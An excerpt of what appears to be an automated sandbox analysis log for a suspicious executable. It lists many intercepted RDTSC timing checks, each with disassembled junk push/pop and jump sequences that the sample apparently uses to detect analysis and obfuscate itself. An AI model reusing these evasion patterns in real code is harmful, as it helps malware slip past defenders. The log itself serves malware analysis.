                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 986605 second address: 986622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1C54A6EA5h 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 988B21 second address: 988B2B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1C4514296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 988B2B second address: 988B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 988B31 second address: 988B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA1C4514296h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 988B3B second address: 988B41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 988B41 second address: 988B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1C45142A7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1C451429Fh 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9984F7 second address: 9984FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 99C263 second address: 99C274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C451429Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 99C274 second address: 99C28D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1C54A6E96h 0x00000008 jmp 00007FA1C54A6E9Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 99BDB0 second address: 99BDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 99BDB4 second address: 99BDBE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1C54A6E96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 99BEF3 second address: 99BEF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B586B second address: 9B5871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B5871 second address: 9B58B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FA1C45142A9h 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FA1C45142A2h 0x00000013 jno 00007FA1C4514296h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B4BE3 second address: 9B4BFF instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1C54A6E9Ch 0x00000008 jo 00007FA1C54A6E96h 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FA1C54A6E96h 0x00000016 jnc 00007FA1C54A6E96h 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B4BFF second address: 9B4C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B51AD second address: 9B51FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1C54A6E96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jng 00007FA1C54A6E96h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c pop eax 0x0000001d jbe 00007FA1C54A6E96h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA1C54A6EA6h 0x0000002b jmp 00007FA1C54A6EA2h 0x00000030 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B51FB second address: 9B5208 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B5208 second address: 9B520E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B54F9 second address: 9B550E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A0h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B550E second address: 9B5542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA4h 0x00000007 jmp 00007FA1C54A6E9Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FA1C54A6E98h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B5542 second address: 9B5546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B5546 second address: 9B554C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9B554C second address: 9B5552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9BAF97 second address: 9BAF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9BAF9C second address: 9BAFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9BB329 second address: 9BB331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D600F9 second address: 4D6012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov eax, 48BC5A6Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FA1C45142A2h 0x00000013 push eax 0x00000014 jmp 00007FA1C451429Bh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edx, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f mov edi, esi 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40DDB second address: 4D40E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007FA1C54A6EA8h 0x0000000c xor si, 2F08h 0x00000011 jmp 00007FA1C54A6E9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ebx, 29443AAAh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007FA1C54A6EA1h 0x00000029 or eax, 1CCE8A26h 0x0000002f jmp 00007FA1C54A6EA1h 0x00000034 popfd 0x00000035 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900D9 second address: 4D900DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900DD second address: 4D900E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900E3 second address: 4D900E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900E9 second address: 4D900ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900ED second address: 4D900F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D900F1 second address: 4D90123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, 7921h 0x0000000e pushfd 0x0000000f jmp 00007FA1C54A6E9Eh 0x00000014 adc ah, FFFFFFB8h 0x00000017 jmp 00007FA1C54A6E9Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D90123 second address: 4D90139 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FA1C451429Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D90139 second address: 4D90148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop edi 0x0000000c mov ch, AEh 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20136 second address: 4D2017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 pushfd 0x00000011 jmp 00007FA1C45142A6h 0x00000016 xor ah, 00000038h 0x00000019 jmp 00007FA1C451429Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2017A second address: 4D201EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA1C54A6E9Bh 0x00000019 xor cx, D75Eh 0x0000001e jmp 00007FA1C54A6EA9h 0x00000023 popfd 0x00000024 mov dl, ch 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FA1C54A6EA3h 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 movsx ebx, cx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D201EF second address: 4D201F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D406A6 second address: 4D406D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA1C54A6EA6h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1C54A6E9Ah 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D406D1 second address: 4D406E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D406E0 second address: 4D406F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6EA4h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D406F8 second address: 4D4074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FA1C451429Fh 0x00000012 call 00007FA1C45142A8h 0x00000017 pop edx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA1C45142A3h 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4074A second address: 4D40750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40750 second address: 4D40754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40754 second address: 4D40758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D405C2 second address: 4D405C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D405C8 second address: 4D405CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D405CD second address: 4D405D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D405D3 second address: 4D405F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, dx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D405F0 second address: 4D40605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C45142A1h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40605 second address: 4D40623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C54A6EA3h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4042F second address: 4D40435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40435 second address: 4D40439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40439 second address: 4D40452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C451429Eh 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D503E4 second address: 4D503F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6E9Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D503F4 second address: 4D504AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA1C45142A6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA1C45142A7h 0x0000001a adc ax, 7DEEh 0x0000001f jmp 00007FA1C45142A9h 0x00000024 popfd 0x00000025 mov ax, 1D77h 0x00000029 popad 0x0000002a push esi 0x0000002b mov esi, edx 0x0000002d pop edi 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007FA1C45142A2h 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bx, FAB0h 0x0000003e pushfd 0x0000003f jmp 00007FA1C45142A9h 0x00000044 add ch, 00000036h 0x00000047 jmp 00007FA1C45142A1h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D504AC second address: 4D504B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D504B1 second address: 4D504D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C451429Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1C451429Dh 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D90028 second address: 4D90044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D90044 second address: 4D9006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C45142A5h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D604E2 second address: 4D604E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D604E6 second address: 4D604EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D604EC second address: 4D60525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C54A6E9Ch 0x00000009 xor si, 51F8h 0x0000000e jmp 00007FA1C54A6E9Bh 0x00000013 popfd 0x00000014 mov dx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA1C54A6E9Ch 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D60525 second address: 4D60529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D60529 second address: 4D6052F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D6052F second address: 4D60540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D60540 second address: 4D605CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA1C54A6E9Ch 0x00000015 sbb ax, 3DE8h 0x0000001a jmp 00007FA1C54A6E9Bh 0x0000001f popfd 0x00000020 mov cx, F1DFh 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FA1C54A6EA0h 0x0000002f and si, D048h 0x00000034 jmp 00007FA1C54A6E9Bh 0x00000039 popfd 0x0000003a jmp 00007FA1C54A6EA8h 0x0000003f popad 0x00000040 and dword ptr [eax+04h], 00000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FA1C54A6E9Ah 0x0000004d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D605CF second address: 4D605D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D605D3 second address: 4D605D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D60063 second address: 4D600A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C451429Eh 0x00000009 adc cx, A518h 0x0000000e jmp 00007FA1C451429Bh 0x00000013 popfd 0x00000014 mov ch, D4h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FA1C451429Ch 0x00000023 pop esi 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D60296 second address: 4D602D5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA1C54A6E9Ah 0x00000008 sub eax, 70D50658h 0x0000000e jmp 00007FA1C54A6E9Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FA1C54A6EA2h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movzx eax, di 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D602D5 second address: 4D602E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D602E4 second address: 4D602E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D602E8 second address: 4D602FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, BBADh 0x00000010 mov eax, 420F65A9h 0x00000015 popad 0x00000016 rdtsc
